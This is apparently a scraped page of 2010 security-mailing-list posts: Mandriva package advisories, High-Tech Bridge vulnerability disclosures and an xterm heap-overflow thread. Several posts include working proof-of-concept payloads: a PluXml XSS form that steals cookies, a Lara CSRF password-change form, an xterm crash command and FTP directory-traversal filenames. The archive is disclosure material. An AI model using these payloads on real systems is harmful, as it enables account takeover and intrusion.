Secunia Research: http://secunia.com/secunia_research/ ==
Re: ubuntu 10.04 xterm heap overflow,can it be exploit ?
This has already been made public: http://lists.grok.org.uk/pipermail/full-disclosure/2010-September/076294.html On Ubuntu, xterm is setgid utmp, which might make it an interesting target for local attacks. However, you'll need to check if it's already dropped group utmp privileges by the time this overflow happens. In either case, glibc heap protection probably makes this very difficult or impossible to exploit anyway. -Dan On Sun, Oct 10, 2010 at 11:07 PM, watercloud watercloud watercl...@xfocus.org wrote: Hi,all ! I find xterm on ubuntu 10.04 have a local heap overflow, I don't known that can it be exploit on glibc 2.11 . detail : watercl...@ubuntu:~/Downloads$ ls -l `which xterm` -rwxr-sr-x 1 root utmp 35 2010-03-31 17:47 /usr/bin/xterm watercl...@ubuntu:~/Downloads$ xterm -fb `perl -e 'print Ax4000'` *** glibc detected *** xterm: munmap_chunk(): invalid pointer: 0x080bd314 *** === Backtrace: = /lib/tls/i686/cmov/libc.so.6(+0x6b591)[0x243591] /lib/tls/i686/cmov/libc.so.6(+0x6c80e)[0x24480e] xterm[0x8062c70] xterm[0x8064b34] xterm[0x805515d] /usr/lib/libXt.so.6(+0x23e30)[0x4a2e30] /usr/lib/libXt.so.6(+0x23fb5)[0x4a2fb5] /usr/lib/libXt.so.6(XtRealizeWidget+0x9d)[0x4a325d] xterm[0x8058176] xterm[0x8069a08] xterm[0x806bf78] /lib/tls/i686/cmov/libc.so.6(__libc_start_main+0xe6)[0x1eebd6] xterm[0x804d6a1] === Memory map: 0011-0012b000 r-xp 08:01 147 /lib/ld-2.11.1.so 0012b000-0012c000 r--p 0001a000 08:01 147 /lib/ld-2.11.1.so 0012c000-0012d000 rw-p 0001b000 08:01 147 /lib/ld-2.11.1.so 0012d000-0012e000 r-xp 00:00 0 [vdso] 0012e000-0014 r-xp 08:01 4191 /usr/lib/libXft.so.2.1.13 0014-00141000 r--p 00011000 08:01 4191 /usr/lib/libXft.so.2.1.13 00141000-00142000 rw-p 00012000 08:01 4191 /usr/lib/libXft.so.2.1.13 00142000-00198000 r-xp 08:01 2715 /usr/lib/libXaw7.so.7.0.0 00198000-00199000 r--p 00055000 08:01 2715 /usr/lib/libXaw7.so.7.0.0 00199000-0019f000 rw-p 00056000 08:01 2715 /usr/lib/libXaw7.so.7.0.0 0019f000-001a rw-p 00:00 0 001a-001d4000 r-xp 08:01 4408 /lib/libncurses.so.5.7 001d4000-001d5000 ---p 00034000 08:01 4408 /lib/libncurses.so.5.7 001d5000-001d7000 r--p 00034000 08:01 4408 /lib/libncurses.so.5.7 001d7000-001d8000 rw-p 00036000 08:01 4408 /lib/libncurses.so.5.7 001d8000-0032b000 r-xp 08:01 1050745 /lib/tls/i686/cmov/libc-2.11.1.so 0032b000-0032c000 ---p 00153000 08:01 1050745 /lib/tls/i686/cmov/libc-2.11.1.so 0032c000-0032e000 r--p 00153000 08:01 1050745 /lib/tls/i686/cmov/libc-2.11.1.so 0032e000-0032f000 rw-p 00155000 08:01 1050745 /lib/tls/i686/cmov/libc-2.11.1.so 0032f000-00332000 rw-p 00:00 0 00332000-0036 r-xp 08:01 850 /usr/lib/libfontconfig.so.1.4.4 0036-00361000 r--p 0002d000 08:01 850 /usr/lib/libfontconfig.so.1.4.4 00361000-00362000 rw-p 0002e000 08:01 850 /usr/lib/libfontconfig.so.1.4.4 00362000-0047b000 r-xp 08:01 4046 /usr/lib/libX11.so.6.3.0 0047b000-0047c000 r--p 00118000 08:01 4046 /usr/lib/libX11.so.6.3.0 0047c000-0047e000 rw-p 00119000 08:01 4046 /usr/lib/libX11.so.6.3.0 0047e000-0047f000 rw-p 00:00 0 0047f000-004ce000 r-xp 08:01 3718 /usr/lib/libXt.so.6.0.0 004ce000-004cf000 r--p 0004e000 08:01 3718 /usr/lib/libXt.so.6.0.0 004cf000-004d2000 rw-p 0004f000 08:01 3718 /usr/lib/libXt.so.6.0.0 004d2000-004e7000 r-xp 08:01 2723 /usr/lib/libXmu.so.6.2.0 004e7000-004e8000 r--p 00014000 08:01 2723 /usr/lib/libXmu.so.6.2.0 004e8000-004e9000 rw-p 00015000 08:01 2723 /usr/lib/libXmu.so.6.2.0 004e9000-004fe000 r-xp 08:01 4016 /usr/lib/libICE.so.6.3.0 004fe000-004ff000 r--p 00014000 08:01 4016 /usr/lib/libICE.so.6.3.0 004ff000-0050 rw-p 00015000 08:01 4016 /usr/lib/libICE.so.6.3.0 0050-00502000 rw-p 00:00 0 00502000-00573000 r-xp 08:01 2033 /usr/lib/libfreetype.so.6.3.22 00573000-00577000 r--p 0007 08:01 2033 /usr/lib/libfreetype.so.6.3.22 00577000-00578000 rw-p 00074000 08:01 2033 /usr/lib/libfreetype.so.6.3.22 00578000-0058 r-xp 08:01 4050 /usr/lib/libXrender.so.1.3.0 0058-00581000 r--p 7000 08:01 4050 /usr/lib/libXrender.so.1.3.0 00581000-00582000 rw-p 8000 08:01 4050 /usr/lib/libXrender.so.1.3.0 00582000-0059 r-xp 08:01 4091 /usr/lib/libXext.so.6.4.0 0059-00591000 r--p d000 08:01 4091 /usr/lib/libXext.so.6.4.0 00591000-00592000 rw-p e000 08:01 4091 /usr/lib/libXext.so.6.4.0 00592000-005a1000 r-xp 08:01 2709 /usr/lib/libXpm.so.4.11.0 005a1000-005a2000 r--p e000 08:01 2709 /usr/lib/libXpm.so.4.11.0 005a2000-005a3000 rw-p f000 08:01 2709 /usr/lib/libXpm.so.4.11.0
Directory Traversal Vulnerability in FreshFTP
Vulnerability ID: HTB22628 Reference: http://www.htbridge.ch/advisory/directory_traversal_vulnerability_in_freshftp.html Product: FreshFTP Vendor: FreshWebMaster ( http://www.freshwebmaster.com ) Vulnerable Version: 5.36 and Probably Prior Versions Vendor Notification: 27 September 2010 Vulnerability Type: Directory Traversal Vulnerability Status: Not Fixed, Vendor Alerted, Awaiting Vendor Response Risk level: High Credit: High-Tech Bridge SA - Ethical Hacking Penetration Testing (http://www.htbridge.ch/) Vulnerability Details: When exploited, this vulnerability allows an anonymous attacker to write files to specified locations on a user's system. The FTP client does not properly sanitise filenames containing directory traversal sequences that are received from an FTP server, for example file named as ..\..\..\..\..\..\..\somefile.exe. By tricking a user to download a directory from a malicious FTP server that contains files with backslash directory traversal sequences in their filenames, an attacker can potentially write files into a user's Startup folder to execute malicious code when the user logs on.
XSS vulnerability in PluXml
Vulnerability ID: HTB22632 Reference: http://www.htbridge.ch/advisory/xss_vulnerability_in_pluxml_1.html Product: PluXml Vendor: PluXml Team ( http://pluxml.org/ ) Vulnerable Version: 5.0.1 and probably prior versions Vendor Notification: 29 September 2010 Vulnerability Type: XSS (Cross Site Scripting) Status: Not Fixed, Vendor Alerted, Awaiting Vendor Response Risk level: Medium Credit: High-Tech Bridge SA - Ethical Hacking Penetration Testing (http://www.htbridge.ch/) Vulnerability Details: User can execute arbitrary JavaScript code within the vulnerable application. The vulnerability exists due to failure in the /core/admin/article.php script to properly sanitize user-supplied input in content variable. Successful exploitation of this vulnerability could result in a compromise of the application, theft of cookie-based authentication credentials, disclosure or modification of sensitive data. An attacker can use browser to exploit this vulnerability. The following PoC is available: form action=http://host/core/admin/article.php; method=post name=main input type=hidden name=artId value=0001 input type=hidden name=title value=article title input type=hidden name=author value=001 input type=hidden name=chapo value= input type=hidden name=content value='page html contentscriptalert(document.cookie)/script' input type=hidden name=day value=23 input type=hidden name=month value=09 input type=hidden name=year value=2010 input type=hidden name=time value=15:45 input type=hidden name=catId[] value=001 input type=hidden name=new_catid value=002 input type=hidden name=new_catname value= input type=hidden name=tags value=PluXml input type=hidden name=allow_com value=1 input type=hidden name=url value=article-page-url input type=hidden name=template value=article.php input type=hidden name=preview value=Aperccedil;u /form script document.main.submit(); /script
[ MDVSA-2010:200 ] wireshark
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDVSA-2010:200 http://www.mandriva.com/security/ ___ Package : wireshark Date: October 13, 2010 Affected: 2010.0, 2010.1, Corporate 4.0, Enterprise Server 5.0 ___ Problem Description: It was discovered that the ASN.1 BER dissector in wireshark was susceptible to a stack overflow (CVE-2010-3445). For 2010.0 and 2010.1 wireshark was upgraded to v1.2.12 which is not vulnerable to this issue and was patched for CS4 and MES5 to resolve the vulnerability. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name= https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=5230 http://www.wireshark.org/security/wnpa-sec-2010-11.html http://www.wireshark.org/security/wnpa-sec-2010-12.html ___ Updated Packages: Mandriva Linux 2010.0: f40ac2df7d649771ca4436997815ff7d 2010.0/i586/dumpcap-1.2.12-0.1mdv2010.0.i586.rpm 6b1ff44460cb8c2d13fe79a7727a7576 2010.0/i586/libwireshark0-1.2.12-0.1mdv2010.0.i586.rpm f1b70e6241c58b97fcaeb694801e939b 2010.0/i586/libwireshark-devel-1.2.12-0.1mdv2010.0.i586.rpm cd3df61a371dd1deccf8fd8fbca80aa7 2010.0/i586/rawshark-1.2.12-0.1mdv2010.0.i586.rpm 960c3289f6e2185517161d9223476d97 2010.0/i586/tshark-1.2.12-0.1mdv2010.0.i586.rpm e46825ba00c144e3f4de545a7996c9ca 2010.0/i586/wireshark-1.2.12-0.1mdv2010.0.i586.rpm 3c30f330037371e1d9f5abbe393e2950 2010.0/i586/wireshark-tools-1.2.12-0.1mdv2010.0.i586.rpm c872e89346410766c482dbf846883e3c 2010.0/SRPMS/wireshark-1.2.12-0.1mdv2010.0.src.rpm Mandriva Linux 2010.0/X86_64: 92be514a497b7463a322d846e6b7e9f6 2010.0/x86_64/dumpcap-1.2.12-0.1mdv2010.0.x86_64.rpm 90c09a2441ab754559cbd8ac8aff112c 2010.0/x86_64/lib64wireshark0-1.2.12-0.1mdv2010.0.x86_64.rpm 779e8575d192294604fa65970edc5279 2010.0/x86_64/lib64wireshark-devel-1.2.12-0.1mdv2010.0.x86_64.rpm c7e58ccd2579d611b0cc30aeec55499f 2010.0/x86_64/rawshark-1.2.12-0.1mdv2010.0.x86_64.rpm 5588757ab177b0992f0cef2a169fd922 2010.0/x86_64/tshark-1.2.12-0.1mdv2010.0.x86_64.rpm a5c953819a8ecbade91aa69a6a9ebf36 2010.0/x86_64/wireshark-1.2.12-0.1mdv2010.0.x86_64.rpm b2a51e06e507aab3af42db5bde28e6ea 2010.0/x86_64/wireshark-tools-1.2.12-0.1mdv2010.0.x86_64.rpm c872e89346410766c482dbf846883e3c 2010.0/SRPMS/wireshark-1.2.12-0.1mdv2010.0.src.rpm Mandriva Linux 2010.1: 5c62d199b162f3234aa1b6bcd1b762a2 2010.1/i586/dumpcap-1.2.12-0.1mdv2010.1.i586.rpm f471133514b535a05e3ff34f6d143249 2010.1/i586/libwireshark0-1.2.12-0.1mdv2010.1.i586.rpm a9a220bbe0b0f00cb3fd4346f3840e4d 2010.1/i586/libwireshark-devel-1.2.12-0.1mdv2010.1.i586.rpm 21029c832b5e55cc7b1a560d1c94d364 2010.1/i586/rawshark-1.2.12-0.1mdv2010.1.i586.rpm f6669ac7083215d23bdaf60c3bff67c2 2010.1/i586/tshark-1.2.12-0.1mdv2010.1.i586.rpm 3e81b5bcf9921fac5ac5c1faee72dd59 2010.1/i586/wireshark-1.2.12-0.1mdv2010.1.i586.rpm a7290eb217dd4b33b309ef6012d6495a 2010.1/i586/wireshark-tools-1.2.12-0.1mdv2010.1.i586.rpm a163debb57786ad7e057be1adbc42dc6 2010.1/SRPMS/wireshark-1.2.12-0.1mdv2010.1.src.rpm Mandriva Linux 2010.1/X86_64: 7404e0d17a12cae4bc0eab808b4c7910 2010.1/x86_64/dumpcap-1.2.12-0.1mdv2010.1.x86_64.rpm 4a11c3b558b22da2a4992f316e172b76 2010.1/x86_64/lib64wireshark0-1.2.12-0.1mdv2010.1.x86_64.rpm fd8be9700208d2de0deb68b4c52dbf29 2010.1/x86_64/lib64wireshark-devel-1.2.12-0.1mdv2010.1.x86_64.rpm 5c55ed9782c1c621bd6fbbc26d4e5a4f 2010.1/x86_64/rawshark-1.2.12-0.1mdv2010.1.x86_64.rpm b03b323ea0bca097af95a375b644f0db 2010.1/x86_64/tshark-1.2.12-0.1mdv2010.1.x86_64.rpm ac8a98fba0778c3b6e605dc56d685137 2010.1/x86_64/wireshark-1.2.12-0.1mdv2010.1.x86_64.rpm 0441430e34ea5dad2fe88367c2d49a4f 2010.1/x86_64/wireshark-tools-1.2.12-0.1mdv2010.1.x86_64.rpm a163debb57786ad7e057be1adbc42dc6 2010.1/SRPMS/wireshark-1.2.12-0.1mdv2010.1.src.rpm Corporate 4.0: a1587f7fd3ad986b4c77b4fefc7cffe4 corporate/4.0/i586/dumpcap-1.0.15-0.2.20060mlcs4.i586.rpm b549bc8586bec1a9d39a52c483086a74 corporate/4.0/i586/libwireshark0-1.0.15-0.2.20060mlcs4.i586.rpm ad5189043e06c0ca244dadbef04713ae corporate/4.0/i586/libwireshark-devel-1.0.15-0.2.20060mlcs4.i586.rpm 12271d314116cbbcae2752103e2c2833 corporate/4.0/i586/rawshark-1.0.15-0.2.20060mlcs4.i586.rpm 902578159f4ac5e1c6cb46b694abfbd6 corporate/4.0/i586/tshark-1.0.15-0.2.20060mlcs4.i586.rpm 4ec8f9b9d98406b4b66058d187449447 corporate/4.0/i586/wireshark-1.0.15-0.2.20060mlcs4.i586.rpm 457d599fcff364ff83f781536319bde0 corporate/4.0/i586/wireshark-tools-1.0.15-0.2.20060mlcs4.i586.rpm 237f35e28dde484145ea6818d3bdeb35
Directory Traversal Vulnerability in AnyConnect
Vulnerability ID: HTB22629 Reference: http://www.htbridge.ch/advisory/directory_traversal_vulnerability_in_anyconnect.html Product: AnyConnect Vendor: AnyConnect ( http://www.anyconnect.net ) Vulnerable Version: 1.2.3.0 and Probably Prior Versions Vendor Notification: 27 September 2010 Vulnerability Type: Directory Traversal Vulnerability Status: Not Fixed, Vendor Alerted, Awaiting Vendor Response Risk level: High Credit: High-Tech Bridge SA - Ethical Hacking Penetration Testing (http://www.htbridge.ch/) Vulnerability Details: When exploited, this vulnerability allows an anonymous attacker to write files to specified locations on a user's system. The FTP client does not properly sanitise filenames containing directory traversal sequences that are received from an FTP server, for example file named as ..\..\..\..\..\..\..\somefile.exe. By tricking a user to download a directory from a malicious FTP server that contains files with backslash directory traversal sequences in their filenames, an attacker can potentially write files into a user's Startup folder to execute malicious code when the user logs on.
XSRF (CSRF) in Lara
Vulnerability ID: HTB22619 Reference: http://www.htbridge.ch/advisory/xsrf_csrf_in_lara.html Product: Lara Vendor: Geographical Media ( http://getlara.com/ ) Vulnerable Version: Current at 18.09.2010 and Probably Prior Versions Vendor Notification: 27 September 2010 Vulnerability Type: CSRF (Cross-Site Request Forgery) Status: Not Fixed, Vendor Alerted, Awaiting Vendor Response Risk level: Low Credit: High-Tech Bridge SA - Ethical Hacking Penetration Testing (http://www.htbridge.ch/) Vulnerability Details: The vulnerability exists due to failure in the /_ui/changepassword script to properly verify the source of HTTP request. Successful exploitation of this vulnerability could result in a compromise of the application, theft of cookie-based authentication credentials, disclosure or modification of sensitive data. Attacker can use browser to exploit this vulnerability. The following PoC is available: form method=POST name=m action=http://host//_ui/changepassword?method=UpdatePasswordtype=get; input type=hidden name=MediaId value=4f90f994-3fd0-4a02-818d-05ce325d0fb1 !-- this is statick value -- input type=hidden name=Password value= /form script do0cement.m.submit(); /script
[ MDVSA-2010:202 ] krb5
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDVSA-2010:202 http://www.mandriva.com/security/ ___ Package : krb5 Date: October 13, 2010 Affected: 2010.1 ___ Problem Description: A vulnerability was discovered and corrected in krb5: The merge_authdata function in kdc_authdata.c in the Key Distribution Center (KDC) in MIT Kerberos 5 (aka krb5) 1.8.x before 1.8.4 does not properly manage an index into an authorization-data list, which allows remote attackers to cause a denial of service (daemon crash), or possibly obtain sensitive information, spoof authorization, or execute arbitrary code, via a TGS request, as demonstrated by a request from a Windows Active Directory client (CVE-2010-1322). The updated packages have been patched to correct this issue. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1322 http://web.mit.edu/kerberos/advisories/MITKRB5-SA-2010-006.txt ___ Updated Packages: Mandriva Linux 2010.1: 81157bb37d800ecb35da0a3ecc28c1ff 2010.1/i586/krb5-1.8.1-5.1mdv2010.1.i586.rpm 8c2a9907b8cefff497d7a447216d9c7b 2010.1/i586/krb5-pkinit-openssl-1.8.1-5.1mdv2010.1.i586.rpm 346919eefb3a68b47b397a70c3d8f3e0 2010.1/i586/krb5-server-1.8.1-5.1mdv2010.1.i586.rpm 11ee424abe5dcfa9ad6de59538230b22 2010.1/i586/krb5-server-ldap-1.8.1-5.1mdv2010.1.i586.rpm 2ae5ec22543e8a85578537849270304a 2010.1/i586/krb5-workstation-1.8.1-5.1mdv2010.1.i586.rpm d239595276e0a51232d5e0b4a1250840 2010.1/i586/libkrb53-1.8.1-5.1mdv2010.1.i586.rpm 7cd0a63672f796106e34841bd52e1734 2010.1/i586/libkrb53-devel-1.8.1-5.1mdv2010.1.i586.rpm 1525493d2bcea9a8ec304fad469ea7d7 2010.1/SRPMS/krb5-1.8.1-5.1mdv2010.1.src.rpm Mandriva Linux 2010.1/X86_64: 46b6f7ef2ea6b6ecb1d0681204ec6588 2010.1/x86_64/krb5-1.8.1-5.1mdv2010.1.x86_64.rpm ad909fb0cf4fb2943f427ca7eebf0fa3 2010.1/x86_64/krb5-pkinit-openssl-1.8.1-5.1mdv2010.1.x86_64.rpm 33321047b0ce237f6c1f89a34c0996b0 2010.1/x86_64/krb5-server-1.8.1-5.1mdv2010.1.x86_64.rpm 019440fece4e6c003e2eb1f0a23de033 2010.1/x86_64/krb5-server-ldap-1.8.1-5.1mdv2010.1.x86_64.rpm a8584fa57d9f9d69a8d8e42b570e5033 2010.1/x86_64/krb5-workstation-1.8.1-5.1mdv2010.1.x86_64.rpm e9568cee380a47ac9b5eec15747f3e4b 2010.1/x86_64/lib64krb53-1.8.1-5.1mdv2010.1.x86_64.rpm d1c6d2772b8218da83681a3aee8a86eb 2010.1/x86_64/lib64krb53-devel-1.8.1-5.1mdv2010.1.x86_64.rpm 1525493d2bcea9a8ec304fad469ea7d7 2010.1/SRPMS/krb5-1.8.1-5.1mdv2010.1.src.rpm ___ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com ___ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team security*mandriva.com -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.9 (GNU/Linux) iD8DBQFMtdnFmqjQ0CJFipgRAmZHAJ9Ld10Yw7pIpu2SFIdDAEf1JoC27gCdEDBW q6lJhVzePsXT7u50NY6cnkQ= =ILfQ -END PGP SIGNATURE-
Directory Traversal Vulnerability in Robo-FTP
Vulnerability ID: HTB22627 Reference: http://www.htbridge.ch/advisory/directory_traversal_vulnerability_in_robo_ftp.html Product: Robo-FTP Vendor: Serengeti Systems Incorporated ( http://www.robo-ftp.com ) Vulnerable Version: 3.7.3 and Probably Prior Versions Vendor Notification: 27 September 2010 Vulnerability Type: Directory Traversal Vulnerability Status: Not Fixed, Vendor Alerted, Awaiting Vendor Response Risk level: High Credit: High-Tech Bridge SA - Ethical Hacking Penetration Testing (http://www.htbridge.ch/) Vulnerability Details: When exploited, this vulnerability allows an anonymous attacker to write files to specified locations on a user's system. The FTP client does not properly sanitise filenames containing directory traversal sequences that are received from an FTP server, for example file named as ..\..\..\..\..\..\..\somefile.exe. By tricking a user to download a directory from a malicious FTP server that contains files with backslash directory traversal sequences in their filenames, an attacker can potentially write files into a user's Startup folder to execute malicious code when the user logs on.
Re: XSS in Oracle default fcgi-bin/echo
I wrote about a week ago: Many Oracle web server installations have a fcgi-bin/echo script left over from default demo (google for inurl:fcgi-bin/echo). That script seems vulnerable to XSS. (PoC exploit and explanation of impact withheld now.) I asked secur...@oracle.com and they said that ... this issue has been resolved in an earlier Critical Patch Update. I looked at some recent CPU summaries, but did not notice anything relevant: maybe their reply refers to the old http://www.kb.cert.org/vuls/id/717827 ? Website owners please remove demo software from production servers, e.g. as per Oracle recommendation http://download.oracle.com/docs/cd/B14099_19/core.1012/b13999/checklist.htm#BABIBCIC Oracle now told me that (they double-checked and) The issue ... has been addressed by the fixes released in CPUJan2007. Could someone verify whether that in fact solves the issue? Hmm... maybe difficult to verify, since I did not post a PoC test. Maybe a kind Oracle admin could point me to a patched fcgi-bin/echo? Funny if any such existed: an admin careful to keep patches up-to-date, but careless in not following security recommendations to remove... Maybe, contact me off-list so I can provide PoC? Cheers, Paul Paul Szabo p...@maths.usyd.edu.au http://www.maths.usyd.edu.au/u/psz/ School of Mathematics and Statistics University of SydneyAustralia
[ MDVSA-2010:201 ] freetype2
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDVSA-2010:201 http://www.mandriva.com/security/ ___ Package : freetype2 Date: October 13, 2010 Affected: 2009.0, 2009.1, 2010.0, 2010.1, Corporate 4.0, Enterprise Server 5.0 ___ Problem Description: A vulnerability was discovered and corrected in freetype2: Marc Schoenefeld found an input stream position error in the way FreeType font rendering engine processed input file streams. If a user loaded a specially-crafted font file with an application linked against FreeType and relevant font glyphs were subsequently rendered with the X FreeType library (libXft), it could cause the application to crash or, possibly execute arbitrary code (integer overflow leading to heap-based buffer overflow in the libXft library) with the privileges of the user running the application. Different vulnerability than CVE-2010-1797 (CVE-2010-3311). Packages for 2009.0 are provided as of the Extended Maintenance Program. Please visit this link to learn more: http://store.mandriva.com/product_info.php?cPath=149products_id=490 The updated packages have been patched to correct this issue. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3311 ___ Updated Packages: Mandriva Linux 2009.0: 248523a7d7a2c3d6a85cb88513f3a830 2009.0/i586/libfreetype6-2.3.7-1.5mdv2009.0.i586.rpm d732b628d679e6c1f1825fc8651dbba4 2009.0/i586/libfreetype6-devel-2.3.7-1.5mdv2009.0.i586.rpm eba4f60c32555f0cccee21bd1604ecdd 2009.0/i586/libfreetype6-static-devel-2.3.7-1.5mdv2009.0.i586.rpm 9a95af00a0336bbd89965d410ecf7dbf 2009.0/SRPMS/freetype2-2.3.7-1.5mdv2009.0.src.rpm Mandriva Linux 2009.0/X86_64: 30127aa3b8f70207269911dc74d5d1f6 2009.0/x86_64/lib64freetype6-2.3.7-1.5mdv2009.0.x86_64.rpm 3b6020558fbaf3651ff7c3ca13f1b7dc 2009.0/x86_64/lib64freetype6-devel-2.3.7-1.5mdv2009.0.x86_64.rpm 0f572c7db1071b843ef103226f058bf8 2009.0/x86_64/lib64freetype6-static-devel-2.3.7-1.5mdv2009.0.x86_64.rpm 9a95af00a0336bbd89965d410ecf7dbf 2009.0/SRPMS/freetype2-2.3.7-1.5mdv2009.0.src.rpm Mandriva Linux 2009.1: 06b12f4db64361f3d7b749ea97b23573 2009.1/i586/libfreetype6-2.3.9-1.6mdv2009.1.i586.rpm bfe315852b8d3e9595796f9c9933694f 2009.1/i586/libfreetype6-devel-2.3.9-1.6mdv2009.1.i586.rpm 2b493d1661300189e5551acf31822088 2009.1/i586/libfreetype6-static-devel-2.3.9-1.6mdv2009.1.i586.rpm 2a72ac2132ed6513dd1b2f93e06364fe 2009.1/SRPMS/freetype2-2.3.9-1.6mdv2009.1.src.rpm Mandriva Linux 2009.1/X86_64: 9b0158596861029412f697767cfce475 2009.1/x86_64/lib64freetype6-2.3.9-1.6mdv2009.1.x86_64.rpm 9389f0616c2633adec3ee5dc0788d0d3 2009.1/x86_64/lib64freetype6-devel-2.3.9-1.6mdv2009.1.x86_64.rpm da638cb0fc6f198e195fefc94ae4d052 2009.1/x86_64/lib64freetype6-static-devel-2.3.9-1.6mdv2009.1.x86_64.rpm 2a72ac2132ed6513dd1b2f93e06364fe 2009.1/SRPMS/freetype2-2.3.9-1.6mdv2009.1.src.rpm Mandriva Linux 2010.0: 81e94386ee8cd6641a46dce9df0efcae 2010.0/i586/libfreetype6-2.3.11-1.4mdv2010.0.i586.rpm e585d63da11b17c74f456ea97368ae97 2010.0/i586/libfreetype6-devel-2.3.11-1.4mdv2010.0.i586.rpm 6f08eacbc92f4b8ea2e2880c97890f9e 2010.0/i586/libfreetype6-static-devel-2.3.11-1.4mdv2010.0.i586.rpm a1cb1cc205c73df55e5576c3d53dfe5b 2010.0/SRPMS/freetype2-2.3.11-1.4mdv2010.0.src.rpm Mandriva Linux 2010.0/X86_64: 8bb4d116a20020735920acdef6edb36c 2010.0/x86_64/lib64freetype6-2.3.11-1.4mdv2010.0.x86_64.rpm 3e71bd23288d28261e6494389a945c8d 2010.0/x86_64/lib64freetype6-devel-2.3.11-1.4mdv2010.0.x86_64.rpm 7c720ab93b651535c31fa51ff7a4062d 2010.0/x86_64/lib64freetype6-static-devel-2.3.11-1.4mdv2010.0.x86_64.rpm a1cb1cc205c73df55e5576c3d53dfe5b 2010.0/SRPMS/freetype2-2.3.11-1.4mdv2010.0.src.rpm Mandriva Linux 2010.1: be9c8f1b5cd2f417f0ae646bc8cbc0f2 2010.1/i586/libfreetype6-2.3.12-1.4mdv2010.1.i586.rpm 87165bb194725472642623489e13c3d2 2010.1/i586/libfreetype6-devel-2.3.12-1.4mdv2010.1.i586.rpm f6b9da29780ed1c3d4192a2de2df965a 2010.1/i586/libfreetype6-static-devel-2.3.12-1.4mdv2010.1.i586.rpm 8f9e6f8272bdd85b655f77c3bc0f1186 2010.1/SRPMS/freetype2-2.3.12-1.4mdv2010.1.src.rpm Mandriva Linux 2010.1/X86_64: 426a77c1681ccb983b4421025a705622 2010.1/x86_64/lib64freetype6-2.3.12-1.4mdv2010.1.x86_64.rpm 8847d5d1a4aa7a007e97e60dc638fcb1 2010.1/x86_64/lib64freetype6-devel-2.3.12-1.4mdv2010.1.x86_64.rpm 1d61007c529ec3775d30fd417829590a 2010.1/x86_64/lib64freetype6-static-devel-2.3.12-1.4mdv2010.1.x86_64.rpm 8f9e6f8272bdd85b655f77c3bc0f1186 2010.1/SRPMS/freetype2-2.3.12-1.4mdv2010.1.src.rpm Corporate 4.0: